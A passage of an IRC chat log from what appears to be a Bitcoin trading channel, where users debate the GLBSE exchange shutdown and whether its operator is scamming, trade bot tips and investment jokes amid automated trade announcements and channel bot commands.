19:03:28 on code submission Oct 10 19:03:29 OR Oct 10 19:03:32 they need to contact you Oct 10 19:03:36 and ask you to MAKE new code Oct 10 19:03:37 to give out Oct 10 19:03:38 lol Oct 10 19:03:39 :P Oct 10 19:03:45 thats the ONLY way that could work Oct 10 19:03:48 and i dont think u wanna do that Oct 10 19:03:51 well... read what joel says about it, anyone with a valid code can just call the aset issuer a scammer Oct 10 19:04:00 even if it was stolen in the email or hacked or sold... Oct 10 19:04:11 true Oct 10 19:05:07 technically Oct 10 19:05:08 at this point Oct 10 19:05:15 the whole assets setup is "compromised" Oct 10 19:05:19 due to nefario Oct 10 19:05:25 he has however many shares he says he has Oct 10 19:05:45 yes he could use 1/2 the codes Oct 10 19:05:47 at this point, the issuers and asset holders have no choice but to trust at least the issuers, or get out Oct 10 19:05:52 anyone trusting nefario the scammer is foolish Oct 10 19:06:53 [MPEX] [S.MPOE] 33600 @ 0.00031285 = 10.5118 BTC [+] Oct 10 19:08:22 ukto i keep talking to you in pm and you dont respond Oct 10 19:08:30 im not getting any msgs Oct 10 19:08:35 takes me a while to catch on why... Oct 10 19:08:39 your not Oct 10 19:08:40 lol Oct 10 19:08:40 yeah Oct 10 19:08:46 you need to be identified Oct 10 19:08:46 :P Oct 10 19:08:50 anyway i wish you the best of luck but sadly i have to sleep now. Oct 10 19:08:58 good night everyone Oct 10 19:09:02 llater Oct 10 19:10:58 Chaang-Noi: I'm gonna need it! :P Oct 10 19:11:23 im sure you will do fine :) Oct 10 19:31:59 [MPEX] [S.MPOE] 52500 @ 0.00031142 = 16.3496 BTC [-] Oct 10 19:32:01 [MPEX] [S.MPOE] 5225 @ 0.00031103 = 1.6251 BTC [-] Oct 10 19:45:19 DeaDTerra: did he mention why he wants aml now? after saying it would not be needed a few weeks ago? and waht he will do with the unclaimed assets/btc held? Oct 10 19:46:18 i think he realised his delima with this, and thats why he put a hold on accepting id's Oct 10 19:47:13 i honestly dont think he's "trying" to scam ppl, i think he's just making some bad decisions Oct 10 19:50:12 He's not "trying" to scam people, he's ACTUALLY scamming people, been that his willing or not Oct 10 19:51:28 its always all about Point of View. someone can do things for all the rights reaons to them, but to everyone else, it can be the worst actions for the worst reasons. such is mankind Oct 10 19:53:13 I like the idea of just opening the damn site and letting use send our assets to the asset creator with an email or something. Oct 10 19:53:51 However I'm sure the reason he doesn’t do that is because people would also expect to get their btc as well in the account. Oct 10 19:54:12 yeh Oct 10 19:54:13 well Oct 10 19:54:17 he could lock down btc withdraw Oct 10 19:54:20 to only ID'd ppl Oct 10 19:54:26 That's what makes him a scammer Oct 10 19:54:33 at least ppl can claim their assets Oct 10 19:54:48 Its not his BTC to hold on to. Oct 10 19:55:18 The assets are just a note of transaction really, the btc being held up is unacceptable. Oct 10 19:55:19 agreed. thats his own issue to deal with Oct 10 19:55:29 i only suggest the asset as a partial solution Oct 10 19:55:47 Yeah, it would certainly help if he opened that up. Oct 10 19:55:59 most ppl have most of their money invested in the shares Oct 10 19:56:06 not just sitting in their accounts Oct 10 19:56:13 Yeah, I only have .09 btc in the account. Oct 10 19:56:18 i think most ppl would agree to say fuck their holdings, in exchange for tehir btc Oct 10 19:56:21 err Oct 10 19:56:25 fuck the btc, in exchange for their assets Oct 10 19:56:35 which is prolly worth the most of the two Oct 10 19:57:04 [MPEX] [S.MPOE] 400 @ 0.00031285 = 0.1251 BTC [+] Oct 10 19:57:06 [MPEX] [S.MPOE] 3039 @ 0.0003129 = 0.9509 BTC [+] Oct 10 19:57:24 if he holds back anyones assets, for any reason Oct 10 19:57:29 then the issuer cannot just move on Oct 10 19:57:40 and he is therefore contridicting himself Oct 10 19:57:46 and might as well just shutdown the server Oct 10 19:57:49 and dissapear Oct 10 19:58:29 there was either no forethought, or not enough when he did this Oct 10 19:58:53 unless his intentions are actually to scam ppl Oct 10 19:58:59 he needs to consider carefully what that means Oct 10 19:59:12 I doubt that, he could have done that long ago. Oct 10 19:59:38 https://btcst.com/login Oct 10 19:59:45 Website still there... Oct 10 19:59:48 if he is having an internal battle over legalities of giving ppl their stuff w/o id, thats a problem he has to bite the bullet on, and move forward doing, because chose to not require id in the first place Oct 10 19:59:57 He got himself in some sort of trouble now that apparent, and if there is any government involvement we know how much worse they make it. Oct 10 20:00:15 if it was govt intervention, the site would just go down Oct 10 20:00:17 and not come back Oct 10 20:00:23 no one would get 'assets' back Oct 10 20:00:25 that would be illegal Oct 10 20:00:57 even if he was given a cease and desist Oct 10 20:00:58 If pirate pays out I could just write Glbse off and still be waaaay ahead. Oct 10 20:01:02 Everything looks just like stalling tactics Oct 10 20:01:14 that would not require him to take ppls id's Oct 10 20:01:21 and the govt doesnt want 1,000's of ppl id's Oct 10 20:01:25 to send them all to jail Oct 10 20:01:29 thats not how it works Oct 10 20:01:55 But if he really is a fucking, evil scammer, he can do a lot with id Oct 10 20:02:43 He can open thousands of glbses on behalf of every sucker who send his id to him Oct 10 20:03:32 He can open bank accounts, traverse borders, and who know how many other things Oct 10 20:03:38 Imagination is the limit Oct 10 20:03:53 he has to bite the bullet and not require id Oct 10 20:03:58 there is no way it will work Oct 10 20:04:04 w/o a scammer tag Oct 10 20:04:10 and possibly legal issues from holders Oct 10 20:04:17 and govt fraud investigations Oct 10 20:04:21 ;;ticker Oct 10 20:04:22 Best bid: 11.97002, Best ask: 12, Bid-ask spread: 0.02998, Last trade: 12, 24 hour volume: 29194, 24 hour low: 11.711, 24 hour high: 12.15 Oct 10 20:04:27 ;;bc,24hprc Oct 10 20:04:28 11.98 Oct 10 20:04:30 At this point we all should be supposing he's an evil scammer Oct 10 20:04:42 until he proove himself Oct 10 20:04:44 thats what he is Oct 10 20:05:05 and the longer he takes, the longer and stronger the tag will get, regardless of his righting things Oct 10 20:05:20 That's right Oct 10 20:05:25 Ukto: still chatting about what happened 'yesterday' or is this something new? Oct 10 20:05:35 I rated him -1 a couple of days ago Oct 10 20:05:36 smickles: id acceptance is closed Oct 10 20:05:44 Now it's a -5 Oct 10 20:06:13 In a couple of days more, he's getting the -10 if he doesn't show good faith Oct 10 20:06:26 ;;rated nefario Oct 10 20:06:27 You rated user nefario on Fri Oct 5 17:57:26 2012, giving him a rating of -1, and supplied these additional notes: seems to have broken contracts and screwed over many people for his own ass. Oct 10 20:06:29 anyone here interested in helping write a trading bot? I have a vague idea of financial strategies and am a decent programmer, so I would mainly be looking for someone to advise on financial strategy. Or be able to point me to more information? Oct 10 20:06:57 I cant blame him for saving his own ass. Oct 10 20:07:02 ;;getrating nefario Oct 10 20:07:03 WARNING: Currently not authenticated. User nefario, rated since Tue Jul 12 19:55:49 2011. Cumulative rating -19, from 15 total ratings. Received ratings: 6 positive, 9 negative. Sent ratings: 2 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=nefario Oct 10 20:07:04 gp5st: i wrote one already,what language are you considering Oct 10 20:07:23 19:07.01 ( Doffx ) I cant blame him for saving his own ass. Oct 10 20:07:30 I wonder how many people here would not tried to save their own ass first haha. Oct 10 20:07:31 you cant blame hashking too then Oct 10 20:07:32 lol Oct 10 20:07:39 and pirate Oct 10 20:07:41 jeez Oct 10 20:07:45 he is only saving his ass Oct 10 20:07:48 smickles: there are a bunch out there, I kind of wanted to do it as an exercise. I was thinking ruby to start Oct 10 20:07:49 cant blame him. Oct 10 20:07:50 It doesn’t make it right Oct 10 20:08:00 smickles: what lang was yours in Oct 10 20:08:17 My point was more, everyone here would most likely save their own ass first. Oct 10 20:08:17 DeaDTerra: but what about those who cant or dont want to provide their id's? Oct 10 20:08:27 amd why wont he just come talk to people Oct 10 20:08:39 gp5st: well, actually i wrote one in java and the other in python, python worked out better Oct 10 20:08:43 thats the worst part Oct 10 20:08:46 is that he wont talk to people Oct 10 20:08:48 gp5st: so ruby should be fine Oct 10 20:08:59 smickles: how come the python bot worked better? Oct 10 20:09:09 i'm sure Oct 10 20:09:28 he should have throught it through alot more thouughly then just pulling the plug Oct 10 20:09:42 Maybe I used the wrong words. Oct 10 20:09:48 smickles: i thought it would be a fun exercise and an opportunity to learn more about trading in general Oct 10 20:09:52 i agree, screw forums heh Oct 10 20:09:56 but still, if he came here of all places Oct 10 20:10:06 gp5st: because java ate memory like nothing else, and the mechanize library in python made things a lot easier, i think ruby has mechanize too Oct 10 20:10:09 and said "hey guys, i am shutting down for legal reasons. and working on a plan" Oct 10 20:10:12 ppl would be alot more understanding Oct 10 20:10:25 he is a criminal now Oct 10 20:10:28 now its making him into more of a criminal Oct 10 20:10:31 because it was not handled right Oct 10 20:10:43 smickles: gotchya. it does Oct 10 20:10:49 he does have limited internet, i agree with that Oct 10 20:10:58 Its always the lack of information I hate. Oct 10 20:11:01 yes Oct 10 20:11:09 if he had even spent 5 minutes writing a paragraph on glbse Oct 10 20:11:10 No one knows what the hell is going on. Oct 10 20:11:12 AT FIRST Oct 10 20:11:16 smickles: where did you find various strategies to implement? Oct 10 20:11:16 ppl would have been more willing Oct 10 20:11:23 my funds are as good as stolen Oct 10 20:11:50 DeaDTerra: can you blame teh community for treating someone who is acting like a sscammer, as a scammer? Oct 10 20:12:01 the problem is, the website goes offline Oct 10 20:12:01 its already happend Oct 10 20:12:08 ppl waited Oct 10 20:12:11 a week Oct 10 20:12:17 gp5st: mostly i was reading various financial articles, academic stuff which I found in a university library Oct 10 20:12:29 then he tells ppl to go trhough near impossible hoops Oct 10 20:12:37 and gives no details Oct 10 20:12:39 smickles: yeah, my next step was the libary Oct 10 20:12:51 gp5st: then I started coming up with my own ideas based on theose and observed the market closly for some time Oct 10 20:12:52 iwhen i saw glbse went down Oct 10 20:12:58 i went to email nefario to ask if I could help Oct 10 20:13:12 as i have tried to help in the past Oct 10 20:13:14 no response Oct 10 20:13:21 no info Oct 10 20:13:23 on anything Oct 10 20:13:38 gp5st: bitcoin's marked is small, so look at analisys of penny stocks in the academic papers, good stuff Oct 10 20:13:44 i think its great that he talked to you Oct 10 20:13:53 smickles: thanks! Oct 10 20:14:01 the problem with that, is he didnt give anything to work with Oct 10 20:14:02 gp5st: np Oct 10 20:14:07 gp5st an interesting strategy I would like to have bot try would be keep an average price a given thing has cost so far per unit for what it has of it so far, and buy any it can afford that are cheaper Oct 10 20:14:49 obviously not a really active strategy and likely to buy too soon when price falls so maybe not very good Oct 10 20:15:08 but then could maybe be improved by buyung only with part of its spending-money Oct 10 20:15:20 so it would get to buy little bits at a time as price falls Oct 10 20:15:22 DeaDTerra: death threats or not, he needs to be more open and communative Oct 10 20:15:25 thats te bottom line Oct 10 20:15:27 or it will make things worse Oct 10 20:15:40 hiding, and staying quite wont help him get less threats Oct 10 20:15:43 and be less of a target Oct 10 20:15:45 a defnsive strategy basically, not aggreessive at all Oct 10 20:15:47 quiet Oct 10 20:15:48 even Oct 10 20:16:05 as I said Oct 10 20:16:10 right now Oct 10 20:16:15 he is damned if he does, and damned if he doesnt Oct 10 20:16:18 his lawyer should have told him that Oct 10 20:16:20 he has 2 choices Oct 10 20:16:24 How is he backed in to a corner? Oct 10 20:16:26 possible govt actions Oct 10 20:16:31 aginst him Oct 10 20:16:35 Unless a lawyer is saying dont say a word or something Oct 10 20:16:36 or possible asset holder actions Oct 10 20:16:37 aginst him Oct 10 20:16:57 correct Oct 10 20:17:17 He doesn’t give a flying fuck about the btc community right now I'm sure Oct 10 20:17:20 but he has, he has relayed via you Oct 10 20:17:27 would you not testify in court taht you talked to him? Oct 10 20:17:37 If hes in legal hot water hes looking at saving himself first, this was my point from before. Oct 10 20:17:52 so if they bring ou phone records, you would deny their existance? Oct 10 20:17:53 it also would not "make" money so its purpose would be its who you give your investment budget to, it spends that budget only if doing so results in it got a lower average price for what it bought Oct 10 20:18:09 Do you know that for sure? Oct 10 20:18:32 sore ppl who have 10,000$ invested, who dont trust him with their id's and want to sue him, or open govt fraud investigations on him, is not putting him in legal hot water? Oct 10 20:18:32 If hes not then where the hell is he? Oct 10 20:18:36 or life threatening situations? Oct 10 20:19:10 it would have been slaugtered on GLBSE though as everything just went into free-fall forever unto worthlessness ;) Oct 10 20:19:25 smickles: in your experience what would be a "successful" weekly ROI? 0.1%? Oct 10 20:19:41 DeaDTerra: agreed... Oct 10 20:19:52 on your guess Oct 10 20:19:54 gp5st: over what time period? Oct 10 20:20:16 DeaDTerra: no lawyer would tell you that a bitcoin X is illegal. they woudl advise aginst it, and tell you that your asking for trouble. Oct 10 20:20:28 smickles: i would probably keep it up for a while. It'll hopefully still be up in a year Oct 10 20:21:10 if you ask a lawyer "is using bitcoins online illegal" they will advise you aginst it, and that it may be illegal, and land you in jail Oct 10 20:21:11 any lawyer Oct 10 20:21:33 gp5st: well, on a 1 year time frame, i should hope you get 5%. but anything better than a 10% loss is good Oct 10 20:21:40 imo Oct 10 20:21:50 smickles: :-p thanks for the encouragment:) Oct 10 20:21:55 yes Oct 10 20:22:00 there is no presidence Oct 10 20:22:03 DeaDTerra: if you do know him that well, you also know he's super paranoid Oct 10 20:22:13 so a lawyer saying "you are at risk" woudl be enough to cause this Oct 10 20:22:29 [MPEX] [S.MPOE] 19377 @ 0.0003129 = 6.0631 BTC [+] Oct 10 20:22:30 doesnt have to be "you are seriously at risk" Oct 10 20:22:30 [MPEX] [S.MPOE] 2516 @ 0.00031329 = 0.7882 BTC [+] Oct 10 20:22:43 if you ask a lowyer if running a web based business at all is illegal they might well advise that if you have to ask, then maybe it is, and probe as to what exactly about what you plan to do is something you think might be illegal and why Oct 10 20:23:04 right Oct 10 20:23:14 i agree 100% with that Oct 10 20:23:25 and unfortnately depending on the govt you get fucked by gray Oct 10 20:23:26 in the US Oct 10 20:23:31 if its gray Oct 10 20:23:41 they determine that its illegal, and then youg et fucked, w/o a chacne to end it Oct 10 20:23:56 other countries will determine it is illegal, and then demand it stopped Oct 10 20:24:13 some countries Oct 10 20:24:17 will determin illegalness Oct 10 20:24:21 issue a sentance Oct 10 20:24:45 and leave the site up, and not re-visit the legality of it *cough(piratebay)cough* Oct 10 20:24:46 how is bitcoin itself legally gray? Oct 10 20:24:57 smickles: depending on your country Oct 10 20:24:57 :) Oct 10 20:25:31 :P Oct 10 20:25:54 Ukto: oh yea, probably a no-go in iran or something Oct 10 20:26:21 btw DeaDTerra, mebbe you can tell me. somoene told me the pirate bay owner was 'released' from jail, and its good to go now. but others told me that he 'escaped'? wtf? Oct 10 20:26:28 smickles: defenitly Oct 10 20:27:44 was another guy jailed, and then released? Oct 10 20:28:19 was told one guy only had to do some 1month in jail, cause of the court time, etc Oct 10 20:28:20 and was released Oct 10 20:28:42 (hell, if i coudl do a piratebay, goto jail for 1 month, and then its good to go. that would be epic( Oct 10 20:35:23 i got into some reddit discussion: http://www.reddit.com/r/Bitcoin/comments/118tii/global_bitcoin_stock_exchange_shuts_down_for_good/ Oct 10 20:35:35 apparently bitcoin magazine has some "internal sources" Oct 10 20:35:52 or they had seen glbse shareholder meeting minutes Oct 10 20:36:34 i learn new things every day Oct 10 20:44:40 Ok this made me laugh Oct 10 20:44:43 mpex is a guy trading shares with himself. Oct 10 20:48:10 [MPEX] [S.MPOE] 27111 @ 0.00031243 = 8.4703 BTC [-] Oct 10 20:48:11 [MPEX] [S.MPOE] 9303 @ 0.00031212 = 2.9037 BTC [-] Oct 10 20:49:59 ;;everify freenode:#bitcoin-otc:e805fee2ec5c5fcf00e1156e189a310ca41f84a038b49e8e0f0b1e97 Oct 10 20:50:00 You are now authenticated for user Cylta with key 35E361F6B371D52E Oct 10 20:54:29 ;;getrating bramz Oct 10 20:54:29 WARNING: Currently not authenticated. User bramz, rated since Fri Sep 21 05:49:16 2012. Cumulative rating 3, from 3 total ratings. Received ratings: 3 positive, 0 negative. Sent ratings: 3 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=bramz Oct 10 21:13:40 [MPEX] [S.MPOE] 6175 @ 0.00031103 = 1.9206 BTC [-] Oct 10 21:13:42 [MPEX] [S.MPOE] 25866 @ 0.0003101 = 8.021 BTC [-] Oct 10 21:23:17 smickles, are you settled in after moving yet? Oct 10 21:38:46 [MPEX] [S.MPOE] 28100 @ 0.00031155 = 8.7546 BTC [+] Oct 10 21:41:19 so, scammer usagi has left the building for good? I bet he has a new username and he is lurking here right now :) Oct 10 21:41:45 Why would he need to do that? Oct 10 21:42:03 Not like he has glbse down, seems silly. Oct 10 21:44:04 maybe he's just putting in overtime at work to repay the two month advance he took to help his assets Oct 10 21:45:43 who took a 2 month advance Oct 10 21:49:16 Has there anything happennd i wasnt aware of? Last I heard was that EskimoBob was the one who deserved that scammer tag for not keeping his word Oct 10 21:52:29 yeah, basically usagi overvalued assets, made backdoor deals, and closed out the collateral fund for his CDO, but who cares now right Oct 10 22:04:35 [MPEX] [S.MPOE] 33037 @ 0.00031152 = 10.2917 BTC [-] Oct 10 22:04:37 [MPEX] [S.MPOE] 5086 @ 0.00031155 = 1.5845 BTC [+] Oct 10 22:04:38 [MPEX] [S.MPOE] 20977 @ 0.00031208 = 6.5465 BTC [+] Oct 10 22:16:33 http://i.imgur.com/Q4P0S.jpg Oct 10 22:17:00 i can see the usefulness. Oct 10 22:20:20 patrick, is that you? http://i.imgur.com/stFPN.jpg Oct 10 22:21:34 Eisenhower34: I think there was 2 or 3 threads demanding a scammer tag for usagi. Exchange went belly up and he was home free. Now he is gone. Oct 10 22:21:53 pufff.... as expected Oct 10 22:24:20 he hated me with passion :) because I understood how full of shit he is and did not keep my mouth shut about it. fkn scumbag and a liar he is Oct 10 22:25:04 knotwork: not quite, the majority of our stuff is arranged to be delivered on the 14th Oct 10 22:29:52 [MPEX] [S.MPOE] 15223 @ 0.00031208 = 4.7508 BTC [+] Oct 10 22:29:54 [MPEX] [S.MPOE] 24335 @ 0.00031329 = 7.6239 BTC [+] Oct 10 22:36:53 knotwork: but i am navigating the red tape in starting up my accounting company Oct 10 22:37:19 *may well call it a bitcoin accounting company Oct 10 22:39:05 Hi Oct 10 22:39:44 I want to invest some of my money in shares - kinda noob - looking for good online trading platforms Oct 10 22:40:02 this might not be the best place to ask Oct 10 22:41:06 sure it is WormDrink Oct 10 22:41:13 WormDrink: This might not be the best moment to ask :) Oct 10 22:41:29 yeah that too Oct 10 22:41:29 timing is bad, place is right Oct 10 22:41:33 cool Oct 10 22:42:39 WormDrink: did you read about Open Transactions? Oct 10 22:43:01 Where is kakobrekla to say: read the f**** topic? Oct 10 22:43:25 EskimoBob, no Oct 10 22:43:28 I did not Oct 10 22:43:33 rdponticelli: jerking of to polish porn Oct 10 22:44:34 Yeah, Open Transactions is the future Oct 10 22:45:59 But it still doesn't have a lot of thing to invest in Oct 10 22:46:27 And at this point is kind of hard to setup for a noob... Oct 10 22:46:33 there's nothing to invest in with Open Transactions yet, no? Oct 10 22:46:48 developer time Oct 10 22:47:01 invest knowledge and time in OT Oct 10 22:47:32 rdponticelli, noob @ shares - not anything else really Oct 10 22:47:33 I think that knotwork has some contracts for cryptocurrencies on his server... Oct 10 22:47:35 but good to know Oct 10 22:47:39 looks intresting Oct 10 22:48:13 Yeah, it's really interesting Oct 10 22:48:42 Really worth investing in it Oct 10 22:55:07 [MPEX] [S.MPOE] 11060 @ 0.00031329 = 3.465 BTC [+] Oct 10 22:55:09 [MPEX] [S.MPOE] 42914 @ 0.00031352 = 13.4544 BTC [+] Oct 10 22:55:10 [MPEX] [S.MPOE] 13426 @ 0.00031355 = 4.2097 BTC [+] Oct 10 23:00:31 sweet, I got one step done Oct 10 23:00:41 the domain i wanted was available Oct 10 23:00:52 smickles.com Oct 10 23:00:59 eh Oct 10 23:01:11 eh? Oct 10 23:01:47 smickles, what u plan? Oct 10 23:02:17 I will provide accounting related professional services in exchange for bitcoin Oct 10 23:02:34 I'll operate out of tucson, AZ as a registered llc Oct 10 23:02:45 sounds excellent Oct 10 23:03:46 as soon as I confirm the total fees which i'll need to pay for licensing and registration, i'll sell some btc for ust too Oct 10 23:03:51 ;;title smickles.com Oct 10 23:03:52 Hover Oct 10 23:04:16 chmod755: what can i say, i liked tucows back in the day Oct 10 23:04:27 there's nothing to invest in with Open Transactions yet, no? --> http://galaxies.mygamesonline.org/digitalisassets.html Oct 10 23:05:00 chmod755: also, I need to contract a webdev sometime shortly Oct 10 23:05:40 what are those "shares" exactly? Oct 10 23:06:06 typically one millionth of the total assets of the corp Oct 10 23:06:36 the value is determined by the script by adding up all that corp's assets and dividing by number (typically a million) of shares Oct 10 23:07:22 of course for e.g. bitcoins there are no known assets to divide by 21,000,000 to determine value per bitcoin :) Oct 10 23:08:22 however for CDN, UKB, MBC, NKL, GMC, GRF, UNS, GZB one can indeed treat them like shares as those nations/corps do own assets Oct 10 23:08:53 basically add up the national reserves the nation has with which to back their currency to see how much to value their currency Oct 10 23:09:19 s/GZB/CZB/ Oct 10 23:15:48 i love it smickles Oct 10 23:17:47 thanks jcpham :) I hope to be up and running soon Oct 10 23:20:42 [MPEX] [S.MPOE] 72100 @ 0.00031093 = 22.4181 BTC [-] Oct 10 23:36:55 smickles.com cool Oct 10 23:37:41 ;;web fetch smickles.com Oct 10 23:37:42 Error: 'smickles.com' is not a valid url. Oct 10 23:37:51 ;;web fetch http://smickles.com Oct 10 23:37:52 '\n\n\nHover\n\n\n can I just hand over all my btc smickles since I am clearly not making wise decisions? Oct 10 23:38:03 Doffx, yes Oct 10 23:38:08 hehe Oct 10 23:41:00 Doffx, you can also give your coins to me if you want Oct 10 23:41:39 No thanks I was hoping to get more returned than I put in. Oct 10 23:41:53 Although at this point its not really worked out that way. Oct 10 23:42:16 i'd invest them to buy a scammer tag so i'm officially allowed to run a ponzi Oct 10 23:42:39 jk Oct 10 23:42:45 I didnt know that was a requirement to run one. Oct 10 23:43:12 Doffx: In bitcoinland you're doing good if you get back something at all Oct 10 23:43:23 I see that now. Oct 10 23:43:39 I did find a really good place to put my coins lately. Oct 10 23:43:57 And the scammer tag is just the prize they gave you when your ponzi has been a success Oct 10 23:44:31 in regards to the past 3 months... there havent been a good place to put your coins in in the last 3 months.... Oct 10 23:44:43 Yes there has. Oct 10 23:45:01 which won? pirate? obsi? hashking? Oct 10 23:45:05 If you kept them in your bitcoin wallet its a great placce. Oct 10 23:45:07 :) Oct 10 23:45:11 I'm afraid about what Doffx is about to say Oct 10 23:45:11 usagi? any mining bond? Oct 10 23:45:26 Eisenhower34, alpaca socks Oct 10 23:45:30 ^^ Oct 10 23:45:41 always a good investment in fall :) Oct 10 23:46:11 just a few weeks and it's winter in the northern hemisphere Oct 10 23:46:17 I have all 20 coins that didnt leave my wallet. Oct 10 23:46:22 value of socks goes up Oct 10 23:46:23 lol Oct 10 23:46:42 i'm up to like 4 bitcoins now Oct 10 23:46:54 guyys you are rich .... Oct 10 23:46:57 [MPEX] [S.MPOE] 3546 @ 0.00031093 = 1.1026 BTC [-] Oct 10 23:46:59 [MPEX] [S.MPOE] 40400 @ 0.00031066 = 12.5507 BTC [-] Oct 10 23:47:00 [MPEX] [S.MPOE] 9654 @ 0.00031028 = 2.9954 BTC [-] Oct 10 23:47:03 gettin mad paid Oct 10 23:47:14 why are those even allowed to talk in here? riight we dont have ay regulations for that :P Oct 10 23:47:16 http://szabo.best.vwh.net/jointstock.html Oct 10 23:47:34 20 coins = rich? Oct 10 23:47:40 super rich Oct 10 23:47:48 icredible mega rich! Oct 10 23:47:50 YAY I'M RICH Oct 10 23:48:11 i sold all of those remaining coins atm Oct 10 23:48:21 i have billions of satoshis Oct 10 23:48:49 billions? Oct 10 23:49:04 wait... Oct 10 23:49:08 IMPOSSIBRU Oct 10 23:49:28 I got hundred billions of em damn satoshis Oct 10 23:49:43 fuck you Bit Gates Oct 10 23:50:47 I'm aiming for the 10 trillion (100 000 BTC) satoshis mark Oct 10 23:51:19 1/210th of all bitcoins Oct 10 23:51:28 BTC-Mining, you don't need 100k BTC Oct 10 23:51:54 Blasphemy! Oct 10 23:52:10 /join #OccupyBTC-Mining Oct 10 23:53:07 Argh, virtual militia! They're squatting my interwebs! Look at their pixely signs! Oct 10 23:53:33 There's even a few violent ones corrupting my bits! Oct 10 23:55:56 [MPEX] [S.MPOE] 39194 @ 0.00031355 = 12.2893 BTC [+] Oct 10 23:57:42 http://fudr.us/ Oct 10 23:57:50 don't know what it is Oct 10 23:57:57 can't answer any question about it Oct 11 00:11:38 jcpham: I can Oct 11 00:11:47 danieldaniel Oct 11 00:11:58 that's all anyone needs to know Oct 11 00:14:45 [MPEX] [O.BTCUSD.P110T] 4 @ 0.09250713 = 0.37 BTC [-] Oct 11 00:31:31 you know what we need? Oct 11 00:31:53 virtual militaries Oct 11 00:32:11 so we can declare war on other websites and then show up at their workplace with a tank. Oct 11 00:32:13 what would a virtual military be composed of Diablo-D3 ? Oct 11 00:32:38 smickles: ^. Oct 11 00:32:53 so a tank for hire, eh? Oct 11 00:37:23 any more news since earlier? Oct 11 00:39:59 [MPEX] [S.MPOE] 35972 @ 0.00031192 = 11.2204 BTC [-] Oct 11 00:43:08 alright, it seems that the total red tape fees will be 75 usd Oct 11 00:43:19 ;;bc,24hprc Oct 11 00:43:23 12.01 Oct 11 00:44:25 ;;sell 6.25 BTC at 12 USD each Oct 11 00:44:25 Error: For identification purposes, you must be identified via GPG to use the order book. Oct 11 00:44:40 grr, i often have to reauth Oct 11 00:45:43 ;;sell 6.25 BTC at 12 USD each Oct 11 00:45:43 Order id 10690 created. Oct 11 00:50:30 https://bitcointalk.org/index.php?topic=117590.0 Oct 11 00:50:36 so relative to this channel Oct 11 00:59:58 ..... Oct 11 01:05:09 [MPEX] [S.MPOE] 16980 @ 0.00031355 = 5.3241 BTC [+] Oct 11 01:05:10 [MPEX] [S.MPOE] 3620 @ 0.00031365 = 1.1354 BTC [+] Oct 11 01:10:42 why does kludge not have scammer tag? Oct 11 01:11:01 Nobody asked? Oct 11 01:11:48 Anyway, he defaulted, but I don't think he's a scammer Oct 11 01:12:13 He's trying to repay, and has been truthful Oct 11 01:12:55 because I think it was in his terms that in case of default, he'd pay back on mining or something like that. Oct 11 01:13:06 Except repayment by mining would take years. Oct 11 01:13:27 But there was no timespan defined for repayment Oct 11 01:13:44 So as such... well he can take his time repaying Oct 11 01:13:48 Something like that Oct 11 01:23:33 jcpham: pics of raritys neice tbh Oct 11 01:26:23 Wow, now Bitcoins Direct is closed Oct 11 01:26:44 There would be anything standing? Oct 11 01:28:10 He talks about law enforcement... Oct 11 01:28:25 Doesn't look good Oct 11 01:29:07 Well, about cooperating with law enforcement, wich implies that law enforcement is involved Oct 11 01:29:45 what is bitcoins direct Oct 11 01:30:21 a tangible Oct 11 01:30:25 [MPEX] [S.MPOE] 23279 @ 0.00031365 = 7.3015 BTC [+] Oct 11 01:30:48 TangibleCryptography's business Oct 11 01:50:09 one sleep till pirate pays out Oct 11 01:50:48 lol Oct 11 01:54:43 2 sleeps here Oct 11 01:54:55 also inb4 more delaying tactics Oct 11 01:54:59 It's always 1 sleep... Oct 11 01:55:04 Forever Oct 11 01:55:06 It will be a long, long night Oct 11 01:55:28 [MPEX] [S.MPOE] 30628 @ 0.00031301 = 9.5869 BTC [-] Oct 11 01:55:30 [MPEX] [S.MPOE] 30346 @ 0.00031028 = 9.4158 BTC [-] Oct 11 01:55:30 Welcome to Groundhog Day Oct 11 01:55:31 [MPEX] [S.MPOE] 15126 @ 0.0003101 = 4.6906 BTC [-] Oct 11 01:56:10 You have to relive the day until you manage to get Pirateat40 to pay. Because payment is always tomorrow until then. Oct 11 01:56:22 Yeah, I'm sure that bitcoin script has been shooted by Harold Raimis Oct 11 01:57:07 Nice thing is that you can kill yourself as many times as you like in the middle Oct 11 01:57:17 Everything just start over again Oct 11 01:57:19 xD Oct 11 02:06:55 GLBSE's up again Oct 11 02:07:27 My claim's finished Oct 11 02:07:56 Even when I haven't send aml information Oct 11 02:08:14 same here Oct 11 02:09:14 I sent AML, claim appears finished. Oct 11 02:09:26 Maybe nefario decided AML was not required... Oct 11 02:13:40 Seem so Oct 11 02:13:52 And it's logical Oct 11 02:14:15 https://docs.google.com/spreadsheet/pub?key=0AvwwyRGyc1WgdEN2dzFuSEtVOWdlTmwyR2VJZkxiX1E Oct 11 02:14:35 Yeah, better get prepared for accounting without GLBSE Oct 11 02:14:46 I already did Oct 11 02:20:50 [MPEX] [S.MPOE] 46900 @ 0.00031365 = 14.7102 BTC [+] Oct 11 02:20:51 ;;bc,stats Oct 11 02:21:00 Current Blocks: 202732 | Current Difficulty: timed out | Next Difficulty At Block: 203615 | Next Difficulty In: 883 blocks | Next Difficulty In About: 6 days, 2 hours, 11 minutes, and 8 seconds | Next Difficulty Estimate: 3035559.56035946 | Estimated Percent Change: -0.624232133735 Oct 11 02:31:38 ;;ticker Oct 11 02:31:39 Best bid: 12.0008, Best ask: 12.08, Bid-ask spread: 0.07920, Last trade: 12.0008, 24 hour volume: 27614, 24 hour low: 11.759, 24 hour high: 12.19 Oct 11 02:31:43 ;;bc,24hprc Oct 11 02:31:44 12.03 Oct 11 02:42:21 yeah, docs not required now Oct 11 02:42:34 i just did the s2cm account, no docs Oct 11 02:45:59 [MPEX] [S.MPOE] 1827 @ 0.00031365 = 0.573 BTC [+] Oct 11 02:46:01 [MPEX] [S.MPOE] 10373 @ 0.00031413 = 3.2585 BTC [+] Oct 11 02:47:38 of so nefario took his meds Oct 11 02:48:39 yay Oct 11 02:48:41 apparently my claim is finished Oct 11 02:49:10 Oct 11 02:49:26 smickles: did you get S2CM data yet? Oct 11 02:49:49 Azelphur: no data yet Oct 11 02:49:54 :p Oct 11 02:50:16 would be funny if everything pays out on friday Oct 11 02:50:18 cash day \o/ Oct 11 02:54:14 Since its my birthday on oct 12 I expect everyone in here to send 1 btc, that will be 7 more btc than what pirate owes me with 116 people in here. Oct 11 02:54:28 Azelphur should send 2 Oct 11 02:54:39 cash day for sure that way :) Oct 